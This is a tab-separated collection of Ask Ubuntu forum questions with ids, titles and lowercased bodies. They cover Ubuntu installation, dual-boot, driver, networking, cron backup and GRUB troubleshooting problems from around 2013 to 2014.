419213	system error dialog box keeps popping up	randomly when i am using my computer a dialog pops up saying `` ubuntu 12.04 has found an error in your system . would you like to report it ? '' and also often times my applications just randomly close . i am not sure if they are corolated . i just got ubuntu on this computer yesterday so i do n't think that i could have screwed up yet . when i click on more details it says that it has to do with some gnome-control-center thing . also my computer is not letting me download any packages . it just says that it has failed whether i do it with sudo apt-get or with ubuntu software center . thanks in advance , eli
419218	monochrome icons in nautilus 3.8	i do n't like the monochrome icons in nautilus 3.8 . i want them to match the rest of my theme , but they do n't change no matter what icon theme i select . how can i change these icons to make them match my theme ?
419222	uninstalled packages ' upgrades being downloaded on apt-get upgrade ?	i recently installed ubuntu and removed many programs i do n't need , like the entire libreoffice suite . however , on performing the most recent upgrade this morning , i discovered that 37mb of my bandwidth was spent on downloading packages for libreoffice , which i do n't have on my system . is it possible to not upgrade for packages i have remove from my system ?
419225	how do i start the game quintet ?	i downloaded the linux version of the game quintet on a machine with ubuntu 13.10 , but now i do n't know how to start the program . the main file is simply named quintet.x86 . double clicking does nothing . the terminal does not recognize it as a command . in properties , the button `` allow executing file as a program '' is checked . i 'm not sure what i need to do here . help ? edit to add : the command file quintet.x86 gave this response- quintet.x86 : elf 32-bit lsb executable , intel 80386 , version 1 ( sysv ) , dynamically linked ( uses shared libs ) , for gnu/linux 2.6.15 , buildid [ sha1 ] =0x3a98f0f283fcfa52e2e34c49f259beb084c55f8f , stripped
419227	please can someone tell me if this motherboard works well with ubuntu ?	i 'm looking to purchase an intel i5 cpu and just want to make sure this board is fully compatible with linux . i 've had bad experiences with gigabyte boards ( specifically am3+ boards ) the board i 'm looking to buy is the msi z87-g41 mate if anyone has any experience with this board , i 'd appreciate some insight . also intel hd 4600 graphics works well with ubuntu right ? thanks a lot .
419228	software for magicjackplus/phoneservice	i would like to use my magicjack hardware on ubuntu 13.10 system , but i dont know how to install it , magicjack has software for windows.could ubuntu have drivers so i can install the magicjack hardware .
419236	is it possible to install ubuntu on mt htc thunderbolt ?	i would like to install ubuntu-touch on my htc thunderbolt . 4g lte
419243	win 8.1 transfer to ubuntu	i downloaded ubuntu to my new toshiba laptop , and at startup it asks which system i want to boot up , but ubuntu will not boot . what do i have to do to solve this ? how do i partition the hard drive ? i am disabled and i want to use ubuntu because it is smoother , and my voice typing software works seamlessly with it . i have win 8.1 right now and it is a nightmare for me . i am a novice user and do not know a lot about managing the computer .
419244	i want to install windows 7 alongside ubuntu	right now i am running ubuntu 13.10 and i want to install windows 7 alongside ubuntu and not delete ubuntu . is there a way to dual boot ubuntu and windows 7 , starting with ubuntu and then installing windows 7 ? i have a lenovo thinkpad t61 with a 250gb hard drive with 3 partitions .
419247	amd radeon r7 250 ubuntu 13.10 open source driver	i am using an amd radeon r7 250 and i have installed the proprietary drivers from amd but i would like to try out the open source driver since i have them on my laptop and that i have good performances . the issue here is that when i uninstall my amd drivers to get the open source one i am getting some display issues . my screen get divided in a bunch of tiny blocks that represent my desktop . so what can i do ?
419250	drag & drop an image+url can not save image	from firefox ( though i think it will do this from other browsers ) if the page i am viewing has an image i would like to save , but the image is wrapped by an anchor link , i can not drag and drop to save the image . if i just drag and drop the image , it will save a link to the anchor target to wherever i dragged . if i drag and drop while holding ctrl , it will save the target of the anchor ( like an entire html page ) . i 'm using ubuntu 13.10 with gnome shell . this is a recently fresh install . i found a few other questions that describe the same problem , but no real answers : unable to save images by dragging and dropping them from browser to nautilus or desktop dragging and dropping from browser to nautilus saves link instead of file , how to change default action ? saving gmail attachments using drag and drop results in a link , not a file one of the questions has an answer , but it describes using ctrl + drag and that only gives me the target of the anchor . i use this drag and drop functionality on windows , and i thought it worked on previous versions of ubuntu ( i used 11.04 or 11.10 for a while ) , but i just switched back to using ubuntu and it 's not working now . i ca n't pinpoint where the problem lies ( ubuntu version , gnome desktop , firefox ) . is this something i need to change a setting for ? will i need to find/make a firefox extension so that it does n't provide an html anchor to the desktop environment 's drag and drop handler ? i 'm not sure where to look about this issue , and any help would be greatly appreciated . manually saving files via right-click menu is tedious .
419252	windows 8 randomly shuts down after installing ubuntu dual boot	the title says most of it . i believe this is a bios issue . upon startup i have several options to boot into , including : ubuntu , with linux 33.11.0-15-generic ubuntu , with linux 33.11.0-15-generic ( recovery mode ) memory test ( memtest86+ ) memory test ( memtest86+ , serial console115200 ) *windows uefi bootmgfw.efi *windows boot uefi loader windows recovery environment ( loader ) ( on /dev/sda2 ) windows 8 ( loader ) ( on /dev/sda4 ) system setup *what is the difference between these and which should i be choosing ? the first one is the one with the boot issue , although it is a bit rare so any or all of the others may also have the issue as well .
419253	need help with mail server on ubuntu	i am running ubuntu 12.04 with nginx i do not have name servers like ns1.mydomain.com neither i have mx records i am using cloudflare for nameservers and then point it to my servers ip . i have installed postfix successfully which is running fine i also setup dovecot and installed mailutils . php mail function is not working i do not know what to do to get it working
419255	just installed ubuntu 13.10 , ca n't get netflix desktop to work	i upgraded from ubuntu 12.04 today and had always used the netflix desktop and never had a problem with it . but after doing a clean install of ubuntu 13.10 , it seems like it 's thinking after i click on the netflix application ( round clock-looking pointer for a couple of seconds ) and then nothing happens . i tried uninstalling the desktop app and reinstalling , but that did n't work . i 'm reading that pipelight is the best way to go ? but following the instructions on this website did not work either . but i am unsure about how to follow the last 2 instructions update 1 and update 2 . note : i 'm not getting any error messages at all .
419256	how do i combine two audio inputs ?	i 'm trying to record both my computer audio and microphone audio . if i go into the alsa audio mixer , i can set my recorder ( in this case , audacity ) to record either computer audio or microphone audio , but i ca n't get it to record both at once . does anyone know how to merge the two into one ?
419258	ubuntu 12.10 as oracle vm guest . no hdmi ?	i am running ubuntu 12.10 on a windows 8.1 host using oracle vm . the monitor that i run ubuntu on is plugged into an hdmi port with an hdmi cable , but the display only gives me 2 options : 800 x 600 or 1280 x 720 . i gave it 128mb video memory ( which was the maximum possible ) , and 3d acceleration . i also installed the radeon video driver . is there a way i can get it to take advantage of the hdmi hardware ? thanks in advance !
419262	no shutdown and odd shutdown ! please help !	i just installed ubuntu 13.10 on my acer m5-583p-6428 laptop and everything seems to be working well except for shutting down and starting up . to turn on the laptop i need to press the power button like 2 or 3 times before it finally powers on ( didnt happen when i had ubuntu 12.04 ) idk if this is malfunction or software ... also my laptop wont shut down ... it either sticks on a black screen or sticks on the ubuntu logo loading screen and idk what to do im just closing the laptop to suspend it for now ... please help !
419268	what packages are and are n't available in ubuntu touch	i 'm just wondering whether i 'll be able to use the cli apps i know and love on a smartphone or tablet running ubuntu touch . can you help me understand what sorts of characteristics of any given package ( whether through apt-get or another package manager such as npm or rubygems ) indicate that it will work or not work on ubuntu touch on an android device , rather than just pointing to a list of known working packages ? one obvious question would be what are the problems compiling things to an arm instruction set instead of x86 ? but i 'm sure there are dozens of other things to consider ... . to use an analogy , in general is ubuntu touch more like microsoft surface pro ( windows ) or microsoft surface ( windows rt ) ?
419269	how to only allow to boot from cd ?	i want to boot from live cd but i ca n't get anything to work . only goes to hdd . tried all the buttons at startup . is there a way to only boot from cd drive ?
419270	how do i install kivy ?	i was trying to install kivy ( by following the instructions here ) . i downloaded and installed all packages where the installation process went through without giving me any errors . however , when later i enter below command ; sudo easy_install kivy it looked like it was going to work but it ends with an error by displaying following lines , which i do n't comprehend : detected compiler is unix /tmp/easy_install-btoa_u/kivy-1.8.0/kivy/graphics/texture.c:8:22 : fatal error : pyconfig.h : no such file or directory # include `` pyconfig.h '' ^ compilation terminated . error : setup script exited with error : command 'x86_64-linux-gnu-gcc ' failed with exit status 1 i saw a similar question asked as ; problem with kivy installation . however , this did n't work for me though the question suggests installing libgles-mesa-dev-lts-raring which i did as below ; sudo apt-get install libgles-mesa-dev-lts-raring which then gave below ; e : unable to locate package libgles-mesa-dev-lts-raring ( sorry for being so specific and perhaps obvious , but i 'm in the early stage of learning my way around linux ) . this user was running ubuntu 12.04 , and most other questions related to this i 've seen came from people with a different release from mine , which has led me to believe that that is the reason why the suggestions to those did n't solve my problem . i 'm using ubuntu 13.10
419272	create launcher shortcut for rdesktop	i am trying to create a 'shortcut ' that i can pin to my launcher in ubuntu 12.04.3 lts that will lauch an rdesktop session . it works fine from the command line thus : rdesktop -u username -d domain -g 1024x720 -a 16 servername i found something close on this forum : terminal command script launcher but it does not quite work . i made the desktop file that contains this ( made it executable etc as per the link above ) : [ desktop entry ] version=1.0 name=rdp-servername comment=open an rdp session to servername exec=rdesktop -u username -d domain -g 1024x720 -a 16 servername terminal=true type=application categories=utility ; application ; i figured if i could get it to work from the desktop , then i could somehow pin it to the launcher afterwards ? however , when i run it from the desktop , nothing seems to happen . i tried choosing the 'terminal ' option , and also the 'run ' option , but neither seems to work . any ideas gratefully received . thanks , alan .
419273	how to use a pre-installed ubuntu , which is on an external drive to boot from any computer ?	i have installed ubuntu 12.04 lts on my external hard drive and it works fine on the computer it was originally installed from . but when i attempt to boot the external drive from another computer ; all i get is black screen with a blinking underscore . do i have to install any similar application/service on each computer or to change anything with grub ? i already know about the usb live cd but this is a full installation of ubuntu that i want to boot , am i doing anything wrong or is there a possible way to succeed ?
419278	upgraded to 13.10 and my airtel connection manager does not detect huawei e398 4g lte modem	i was using the airtel 4g lte modem ( huawei e398 ) with the airtel connection manager successfully in ubuntu 12.10 ( in one partition , have ubuntu 13.04 in another partition ) . upgraded to ubuntu 13.10 2 days back and since then i could n't get connected . the airtel connection manager would start but not detect the modem . i tried adding a connection manually but that did not work either . any insight would be helpful .
419286	grub rescue rescue error on boot even after trying a `` boot repair ''	i tried to load ubuntu 12.04 onto an old machine from a cd and the installation went fine , but i got the boot error : no such device : grub rescue . i looked into the issue with a cd live boot ( unsure of the terminology , but i selected the option to try ubuntu desktop ) and found this forum post suggesting a boot repair program . i installed it from the terminal . i ran the program , it said it was fixed , and i tried to start it up no no avail . it gave me an ubuntu pastebin and to ask if i had any troubles . what should i try now to fix this ? i am not very educated in programming or linux type operating systems yet . but i would appreciate any help and will try to give as much information as necessary . so far the only way my access desktop is using the installation disk .
419287	sudo can not do cd	i found the strangest thing sudo cd $ pwd sudo : cd : command not found i am able to cd as a normal user.it seems that path is not set properly for su . how do i fix that ?
419288	unable to locate package cgroups-lite	$ sudo apt-get install cgroups-lite [ sudo ] password for neethu : reading package lists ... done building dependency tree reading state information ... done e : unable to locate package cgroups-lite
419289	unable to create more than one device with dmsetup inside lxc	i am using lxc for running encryption app . the app run `` dmsetup '' on devices added in the container/vm . on running the `` dmsetup create clear_sdb1 '' the device gets created as /dev/mapper/clear_sdb1 however similar thing does not happen when i add 2nd device sdb2 . strangely both /dev/mapper/clear_sdb1 and /dev/mapper/clear_sdb2 starts showing up in host 's device hierarchy . should it never get created in host machine . the /dev/mapper/control is already present in container . i have disabled the apparmor in config file . all the devices are given `` rwm '' permissions . will be using this setup for simulating many virtual machines . /dev/mapper is the only blocker currently , since my app is working fine with one device . host = > linux avatar 3.11.0-15-generic # 23-ubuntu smp mon dec 9 18:17:04 utc 2013 x86_64 x86_64 x86_64 gnu/linux container = > linux cn-01 3.11.0-15-generic # 23-ubuntu smp mon dec 9 18:17:04 utc 2013 x86_64 x86_64 x86_64 gnu/linux lxc version : 1.0.0.alpha1
419304	dpkg-divert : error : rename involves overwriting `/usr/lib/xorg/protocol.txt ' with different file `/usr/lib/xorg/protocol-precise.txt ' , not allowed	i just installed ubuntu ( 12.04.4 ) and i upgraded to 13.10 i have no idea how to fix this : / $ sudo apt-get install -f reading package lists ... done building dependency tree reading state information ... done the following packages will be removed : xserver-common-lts-saucy 0 upgraded , 0 newly installed , 1 to remove and 2 not upgraded . 1 not fully installed or removed . after this operation , 1,718 kb disk space will be freed . do you want to continue [ y/n ] ? y ( reading database ... 175174 files and directories currently installed . ) removing xserver-common-lts-saucy ... removing 'diversion of /usr/lib/xorg/protocol.txt to /usr/lib/xorg/protocol-precise.txt by xserver-common-lts-saucy' dpkg-divert : error : rename involves overwriting `/usr/lib/xorg/protocol.txt ' with different file `/usr/lib/xorg/protocol-precise.txt ' , not allowed dpkg : error processing xserver-common-lts-saucy ( -- remove ) : subprocess installed post-removal script returned error exit status 2 errors were encountered while processing : xserver-common-lts-saucy e : sub-process /usr/bin/dpkg returned an error code ( 1 )
419306	xubuntu 13.10 unable to connect to router ( with internet connectivity ) via ethernet	i 'm running a msi b85-g43 gaming motherboard , just got xubuntu 13.10 and the installation went fine except for connectivity to the router . i 've plugged in my ethernet cable from my router to the motherboard , and there are light-up signals on my router and motherboard , however xubuntu is unable to detect any internet connectivity . i 'm not sure if i am missing anything here , would i need to install any drivers for the ethernet ? i doubt so as the motherboard is built in with killer e2200 ethernet ... i can run any commands if you need more information , but i 'm not really sure how to proceed from here ... thanks and warm regards~
419308	cronjob for mysql backup bash script not running	i am trying to backup many mysql databases on a daily basis into a single zip . the bash script works fine by itself ( ran in normal environment ) , but when the cronjob takes over it does not run . infact it actually made the wget stop working which was working until i added the bash script into the cronjob . i 've searched all over the place and noticed that the problem with most people lies in the path . unfortunately , i do n't have enough knowledge to be able to edit the path to what i need and thus just copied it and edited the username from another stackexchange question . any help would be great ! this is my backup.sh file with the username , password , and database names replaced by fake ones . # ! /bin/bash shell=/bin/sh path=/usr/local/sbin : /usr/local/bin : /usr/sbin : /usr/bin : /sbin : /bin : /home/username/bin echo `` ========= '' echo `` mysql backup started '' now= $ ( date + % y % m % d ) cd /home/username mkdir temp_backups mysqldump -u root -pnotmyrealpass fake1 > /home/username/temp_backups/fake1.sql mysqldump -u root -pnotmyrealpass fake2 > /home/username/temp_backups/fake2.sql mysqldump -u root -pnotmyrealpass fake3 > /home/username/temp_backups/fake3.sql mysqldump -u root -pnotmyrealpass fake4 > /home/username/temp_backups/fake4.sql mysqldump -u root -pnotmyrealpass fake5 > /home/username/temp_backups/fake5.sql mysqldump -u root -pnotmyrealpass fake6 > /home/username/temp_backups/fake6.sql mysqldump -u root -pnotmyrealpass fake7 > /home/username/temp_backups/fake7.sql mysqldump -u root -pnotmyrealpass fake8 > /home/username/temp_backups/fake8.sql mysqldump -u root -pnotmyrealpass fake9 > /home/username/temp_backups/fake9.sql tar zcvf sqlbackup_ $ now.tar.gz -c temp_backups . mv sqlbackup_ $ now.tar.gz backups rm -rf temp_backups echo `` mysql backup ended '' echo `` ========= '' this is my crontab.txt with the username and websiteurl removed . * * * * * wget http : //www.testing.com/expire.php > /home/username/expire.log 2 > & 1 * * * * * /home/username/bin/backup.sh > /home/username/backup.log 2 > & 1 this is what is returned by ls -l ( aliased to ls ) . $ ls -rwxr-xr-x 1 username username 1.2k feb 11 07:17 backup.sh this is what is show in /var/log/syslog with the username and websiteurl removed . cron [ 17979 ] : ( username ) cmd ( /home/username/bin/backup.sh > /home/username/backup.log 2 > & 1^m ) cron [ 10804 ] : ( username ) cmd ( wget http : //www.testing.com/expire.php > /home/username/expire.log 2 > & 1^m )
419309	ubuntu and xubuntu too big for 1 cd , can you put it on 2 cds ? ? how do you do that .	ubuntu and xubuntu has gotten too big for just one cd . i prefer to use cd not dvd . many older machine do not have dvd capability or not usb bootable . so how can i get ubuntu on several cds . is there some way to do this ? ? ? will ubuntu make a both cd and dvd iso options ? ?
419314	ca n't import keys to keyring , nothing happening	i 'm trying to use keyring 's import functionality but nothing happens - neither an error of any sort , nor any of my keys getting imported into keyring 's gui . i created a public/private key using gpg on the commandline , then exported it with the public key in one file and private key in another : mykey.public.asc mykey.private.asc i 've successfully uploaded them to pgp.mit.edu and keyserver.ubuntu.com . but when i try to import them , either from the local files or the keyserver , nothing happens . no error , no import . anyone know what might be the problem ? i 'm actually doing this primarily to start using pgp in mozilla thunderbird email via enigmail , in case that makes a difference . > sudo gpg -- list-packets byron @ vaurum.com.asc : public key packet : version 4 , algo 1 , created 1392086961 , expires 0 pkey [ 0 ] : [ 2048 bits ] pkey [ 1 ] : [ 17 bits ] : user id packet : `` byron gibson ( vaurum \x7c head of operations ) < byron @ vaurum.com > '' : signature packet : algo 1 , keyid 6c9477cdd2cea3c9 version 4 , created 1392086961 , md5len 0 , sigclass 0x13 digest algo 2 , begin of digest 95 81 hashed subpkt 2 len 4 ( sig created 2014-02-11 ) hashed subpkt 27 len 1 ( key flags : 03 ) hashed subpkt 11 len 5 ( pref-sym-algos : 9 8 7 3 2 ) hashed subpkt 21 len 5 ( pref-hash-algos : 8 2 9 10 11 ) hashed subpkt 22 len 3 ( pref-zip-algos : 2 3 1 ) hashed subpkt 30 len 1 ( features : 01 ) hashed subpkt 23 len 1 ( key server preferences : 80 ) subpkt 16 len 8 ( issuer key id 6c9477cdd2cea3c9 ) data : [ 2047 bits ] : public sub key packet : version 4 , algo 1 , created 1392086961 , expires 0 pkey [ 0 ] : [ 2048 bits ] pkey [ 1 ] : [ 17 bits ] : signature packet : algo 1 , keyid 6c9477cdd2cea3c9 version 4 , created 1392086961 , md5len 0 , sigclass 0x18 digest algo 2 , begin of digest c9 b1 hashed subpkt 2 len 4 ( sig created 2014-02-11 ) hashed subpkt 27 len 1 ( key flags : 0c ) subpkt 16 len 8 ( issuer key id 6c9477cdd2cea3c9 ) data : [ 2047 bits ]
419317	ubuntu 13.10 virtual box usb	i have win7x64 as a guest os on my virtual box 4.2.16. usb is not displayed on explorer on the guest os even after choosing the appropriate from devices menu
419320	purple color of boot splash screen not changing	i am trying to change the boot purple screen to black so i searched to find this . i followed the last answer ( by heisenberg ) saying : if you do n't like the purple screen when you first turn on the computer and want to change it to black . here are the instructions to accomplish this . open the file /lib/plymouth/themes/ubuntu-logo/ubuntu-logo.script with a text editor find the two lines quoted below in the script change all the values in the brackets to â0â then save the file window.setbackgroundtopcolor ( 0.0 , 0.00 , 0.0 ) ; # nice colour on top of the screen fading to window.setbackgroundbottomcolor ( 0.0 , 0.00 , 0.0 ) ; # an equally nice colour on the bottom run the following command in the terminal sudo update-initramfs -u the colour of the boot splash background will now be black instead of purple when you reboot . i 've opened the ubuntu-logo.script file with gedit but am unable to save it . where am i wrong ?
419321	realigning ubuntu raid - partition misaligned by 3072 bytes	i 've run into this issue with the `` advanced format '' drives - and it is dramatically affecting the speed of the array . all resolutions i found seemed to deal with raid arrays if ubuntu was a part of the array - my layout is ubuntu on a non-raid drive , with a separate array for important data . is there a way for me to resolve this while keeping the data in tact ? if not , how do i reformat the permissions to ensure this does not reoccur ? thankyou very much ! here 's my raid array ( created with palimpsest ) : http : //i.stack.imgur.com/cz1tv.png here 's one of the 3x drives - all have the same error : http : //i.stack.imgur.com/4tsnd.png
419323	how to compile gtk+3.10 programs in ubuntu 13.10 ?	i 'm learning gtk+3 . i can compile my program on fedora , but when i tested it on ubuntu 13.10 , i got errors undefined reference to gtk_widget_init_template and undefined reference to gtk_widget_class_set_template_from_resource while compiling . does ubuntu provide support for gtk+3.10 ? since the two mentioned above are introduced in gtk+3.10 . i 'm sure i 've installed all regular development files needed by gtk .
419324	ca n't connect to specific wireless	i 've just upgraded from 10.04 to 12.04 . before the upgrade , i could connect to my wireless connection . after the upgrade , i could n't find the connection i use . however , other connections are visible . i 've tried some other tactics but they 've not worked for me . currently using a broadcom sta driver . all other gadgets can connect to the wireless except my laptop . edit : /etc/networkmanager/system-connections is a directory is what i 've got . i 'm pretty new at this .
419325	dual boot with windows 8.1 and ubuntu 13.10	i have a laptop that had windows 7 previously installed but now has windows 8.1 . i want to dual boot with ubuntu 13.10 . but i was curious on how to do this properly and in the case that grub messes up my computer just delete it and restore it to the original windows bootloader . also do n't recommend easybcd . i do n't mind using grub but i want to be sure i can remove ubuntu and grub .
419327	how can i make virtualbox guests share the host 's vpn connection ?	question when i start my vpn on my ubuntu desktop computer which acts as a router , the attached subnet loses internet connectivity , but is still accessible ( lan ) . ideally , i would like to know how to enable the attached subnet to re-gain internet access by routing through the vpn tunnel when the vpn is active . context i have the following network layout : subnet 172.16.0.0/20 on eth0 for my virtualbox virtual machines . subnet 192.168.0.0/24 on eth0:0 which connects to gateway 192.168.0.1 which has internet access . this is shown in the /etc/network/interfaces file : auto lo iface lo inet loopback # this is the subnet dedicated to vb auto eth0 iface eth0 inet static address 172.16.0.1 netmask 255.255.0.0 gateway 192.168.0.164 dns-nameservers 8.8.8.8 # normal dhcp internet auto eth0:0 iface eth0:0 inet static address 192.168.0.164 netmask 255.255.255.0 dns-nameservers 8.8.8.8 gateway 192.168.0.1 the packets on the eth0 are forwarded through eth0:0 with masquerading and normal internet connectivity is fine . however when i start my vpn tunnel on this router , internet connectivity is lost for the vms on the eth0 subnet ( yet remains for the router ) . below is the output of ifconfig when the tunnel is active : eth0 link encap : ethernet hwaddr 00:1f : bc:01 : c3 : ab inet addr:172.16.0.1 bcast:172.16.255.255 mask:255.255.0.0 inet6 addr : fe80 : :21f : bcff : fe01 : c3ab/64 scope : link up broadcast running multicast mtu:1500 metric:1 rx packets:165426 errors:0 dropped:0 overruns:0 frame:0 tx packets:182601 errors:0 dropped:0 overruns:0 carrier:0 collisions:0 txqueuelen:1000 rx bytes:208264321 ( 208.2 mb ) tx bytes:16660945 ( 16.6 mb ) interrupt:16 eth0:0 link encap : ethernet hwaddr 00:1f : bc:01 : c3 : ab inet addr:192.168.0.164 bcast:192.168.0.255 mask:255.255.255.0 up broadcast running multicast mtu:1500 metric:1 interrupt:16 lo link encap : local loopback inet addr:127.0.0.1 mask:255.0.0.0 inet6 addr : : :1/128 scope : host up loopback running mtu:65536 metric:1 rx packets:381963 errors:0 dropped:0 overruns:0 frame:0 tx packets:381963 errors:0 dropped:0 overruns:0 carrier:0 collisions:0 txqueuelen:0 rx bytes:22755054 ( 22.7 mb ) tx bytes:22755054 ( 22.7 mb ) tun0 link encap : unspec hwaddr 00-00-00-00-00-00-00-00-00-00-00-00-00-00-00-00 inet addr:10.8.0.10 p-t-p:10.8.0.9 mask:255.255.255.255 up pointopoint running noarp multicast mtu:1500 metric:1 rx packets:0 errors:0 dropped:0 overruns:0 frame:0 tx packets:0 errors:0 dropped:0 overruns:0 carrier:0 collisions:0 txqueuelen:100 rx bytes:0 ( 0.0 b ) tx bytes:0 ( 0.0 b ) i suspect that the solution will have something to do with the routing table . it shows the following when the tunnel is active : destination gateway genmask flags metric ref use iface default 10.8.0.9 128.0.0.0 ug 0 0 0 tun0 default 192.168.0.1 0.0.0.0 ug 100 0 0 eth0 10.8.0.0 10.8.0.9 255.255.255.0 ug 0 0 0 tun0 10.8.0.9 * 255.255.255.255 uh 0 0 0 tun0 37.139.23.49 192.168.0.1 255.255.255.255 ugh 0 0 0 eth0 128.0.0.0 10.8.0.9 128.0.0.0 ug 0 0 0 tun0 link-local * 255.255.0.0 u 1000 0 0 eth0 172.16.0.0 * 255.255.0.0 u 0 0 0 eth0 192.168.0.0 * 255.255.255.0 u 0 0 0 eth0 and the following when the tunnel inactive : destination gateway genmask flags metric ref use iface default 192.168.0.1 0.0.0.0 ug 100 0 0 eth0 link-local * 255.255.0.0 u 1000 0 0 eth0 172.16.0.0 * 255.255.0.0 u 0 0 0 eth0 192.168.0.0 * 255.255.255.0 u 0 0 0 eth0 virtualbox configuration for vms : one of the vms /etc/network/interfaces file : # the loopback network interface auto lo iface lo inet loopback # the primary network interface auto eth0 iface eth0 inet static address 172.16.0.3 netmask 255.255.0.0 network 172.16.0.0 broadcast 172.16.255.255 gateway 172.16.0.1 dns-nameservers 8.8.8.8
419335	how to install ubuntu touch for smartphone ?	i am using samsung galaxy trend smarttphone . can i install ubuntu touch in my smartphone ? if yes how ?
419336	upgrading ubuntu without touching the mbr	tl ; dr : is there a way of doing a do-release-upgrade and being sure that it wo n't touch the mbr ? background : i have windows 7 and ubuntu on my laptop . i have truecrypt 's bootloader in the mbr as i use it to encrypt the windows partition . if i bypass truecrypt 's auth at boot time , i can pass control to grub which sits on the ubuntu partition . this might be an unusual config , but this is how i like it : - ) the problem : when i upgraded to a newer release , the mbr was overwritten with grub , meaning that i had to use a truecrypt rescue disk to recover my original configuration . i 'd like to avoid this if possible . now i need to upgrade , and i 'm nervous about kicking off an automated process that will cause the same problem .
419338	where is the database file from redmine after using the defaultinstallation ?	after i installed redmine , i have a database called redmine and through phpmyadmin i can take a backup etc . , but i ca n't find the default location of it . where is it placed ? any idea ? does mysql store it somewhere or is it done by redmine ? i tried to find it using `` locate '' without any success , since i do n't know if the db name is as well the filename . any help is upvoted .
419341	how can i run a simple text to speech command ?	in windows i can do these steps : 1 . open notepad 2 . copy and paste createobject ( `` sapi.spvoice '' ) .speak '' hello . '' 3 . save it as xyz.vbs 4 . run it/open it it will then speak `` hello '' . is there something like this in ubuntu ?
419345	after i changed mysql datadir to an extra usb drive ( /media/***/mysql ) , ubuntu ca n't boot without that disk	forgive my poor english and thank you for your time . i got a boot problem since i changed the data directory of mysql to an usb drive followed a web site guidence . i 'm pretty sure that mysql works just fine.i also disabled the auto-startup for the apache2 and mysql . but it still does n't work . there 's a similar question on the forums . ca n't boot without flash drive plugged in and that solution wo n't help either.so what should i do ?
419348	exporting into pdf with libreoffice ?	i am facing problem while exporting libreoffice calc file into pdf . i want it to be in single sheet 1 page but its becoming 2 pages .
419349	ubuntu not booting any more after a clean windows 7 shutdown	i had installed ubuntu 12.04 from windows 7 using wubi.exe . for more than 8 months it was running fine . today i booted into windows 7 then i shut it down properly and tried to boot ubuntu . i started getting following error . try ( hd0,0 ) : ntfs5 : no wubildr try ( hd0,1 ) : try ( hd0,1 ) : ntfs5 : error `` prefix '' is not set i booted windows again , before booting it ran a disk check chkdsk automatically and i noticed that it has deleted swap.disk and root.disk files from the ntfs partition labeled forub i greatly appreciate any help to get my ubuntu os & files back . i had pulled the log content of this event and it is as follows : checking file system on e : the type of the file system is ntfs . volume label is forub . one of your disks needs to be checked for consistency . you may cancel the disk check , but it is strongly recommended that you continue . windows will now check the disk . chkdsk is verifying files ( stage 1 of 3 ) ... the record length 0x2b0 is too large for attribute of type 0x80 and instance tag 0x4 in file 0x204 . the maximum value is 0x150 . truncating badly linked attribute records from file record segment 516 . deleted corrupt attribute list entry with type code 128 in file 516 . unable to locate attribute of type 0x80 , lowest vcn 0x0 , instance tag 0x4 in file 0x204 . the first attribute of type 0x30 and instance tag 0x0 in file 0x204 should not be resident . deleted corrupt attribute list entry with type code 48 in file 516 . unable to locate attribute with instance tag 0x3 and segment reference 0x2000000000204 . the expected attribute type is 0x30 . deleting corrupt attribute record ( 48 , `` '' ) from file record segment 516 . unable to locate attribute with instance tag 0x0 and segment reference 0x4000000000209 . the expected attribute type is 0x80 . deleting corrupt attribute record ( 128 , `` '' ) from file record segment 521 . unable to locate attribute with instance tag 0x0 and segment reference 0x300000000020a . the expected attribute type is 0x80 . deleting corrupt attribute record ( 128 , `` '' ) from file record segment 522 . unable to locate attribute with instance tag 0x0 and segment reference 0x600000000020b . the expected attribute type is 0x80 . deleting corrupt attribute record ( 128 , `` '' ) from file record segment 523 . 768 file records processed . file verification completed . 1 large file records processed . 0 bad file records processed . 0 ea records processed . 0 reparse records processed . chkdsk is verifying indexes ( stage 2 of 3 ) ... there is no dos file name attribute in file 0x204 . correcting minor file name errors in file 516 . unable to locate the file name attribute of index entry root.disk of index $ i30 with parent 0x1de in file 0x204 . deleting index entry root.disk in index $ i30 of file 478 . unable to locate the file name attribute of index entry root~1.dis of index $ i30 with parent 0x1de in file 0x204 . deleting index entry root~1.dis in index $ i30 of file 478 . index entry swap.disk of index $ i30 in file 0x1de points to unused file 0x205 . deleting index entry swap.disk in index $ i30 of file 478 . index entry swap~1.dis of index $ i30 in file 0x1de points to unused file 0x205 . deleting index entry swap~1.dis in index $ i30 of file 478 . 936 index entries processed . index verification completed . chkdsk is scanning unindexed files for reconnect to their original directory . 1 unindexed files scanned . recovering orphaned file root.disk ( 516 ) into directory file 478 . 0 unindexed files recovered . chkdsk is verifying security descriptors ( stage 3 of 3 ) ... 768 file sds/sids processed . cleaning up 6 unused index entries from index $ sii of file 0x9 . cleaning up 6 unused index entries from index $ sdh of file 0x9 . cleaning up 6 unused security descriptors . security descriptor verification completed . inserting data attribute into file 516 . 85 data files processed . chkdsk discovered free space marked as allocated in the master file table ( mft ) bitmap . chkdsk discovered free space marked as allocated in the volume bitmap . windows has made corrections to the file system . 104857599 kb total disk space . 2168536 kb in 398 files . 124 kb in 86 indexes . 0 kb in bad sectors . 69923 kb in use by the system . 65536 kb occupied by the log file . 102619016 kb available on disk . 4096 bytes in each allocation unit . 26214399 total allocation units on disk . 25654754 allocation units available on disk . internal info : 00 03 00 00 ef 01 00 00 5f 02 00 00 00 00 00 00 ... ... .._ ... ... . 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ... ... ... ... ... . 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ... ... ... ... ... . update : after this if i try to boot ubuntu . it just loads grub and stops with prompt as follows : grub > the central file system control structure of the ntfs file system is the master file table . so the above event modified it . is there any one who tried to read and edit the mtf ?
419350	software selection screen in ubuntu installer	while installing ubuntu 12.04 , i am asked to choose whether to install these predefined collections of software , which are displayed in this screen : i am just interested in having a standard ubuntu 12.04 desktop ( possibly running unity ) . i do not have disk space issues , so it would n't be a problem to install something i do n't need if it will simplify the installation . could you suggest me what software i should select ? i already tried this installation before . after the completion of the installation , i am only shown a terminal , but not the login gui . in case i am shown the terminal again , could you suggest what commands i should run ? edit : list of software options : ... basic ubuntu server openssh server ... openstack ... edubuntu desktop kubuntu desktop kubuntu full ladspa/lv2/dssi audio plugins large selection of font packages lubuntu minimal installation mythbuntu additional roles mythbuntu frontend mythbuntu master backend mythbuntu slave backend tone generation and editing suite ubuntu lxde desktop ubuntu desktop ubuntu dektio usb video creation and editing suite xubuntu desktop manual package selection
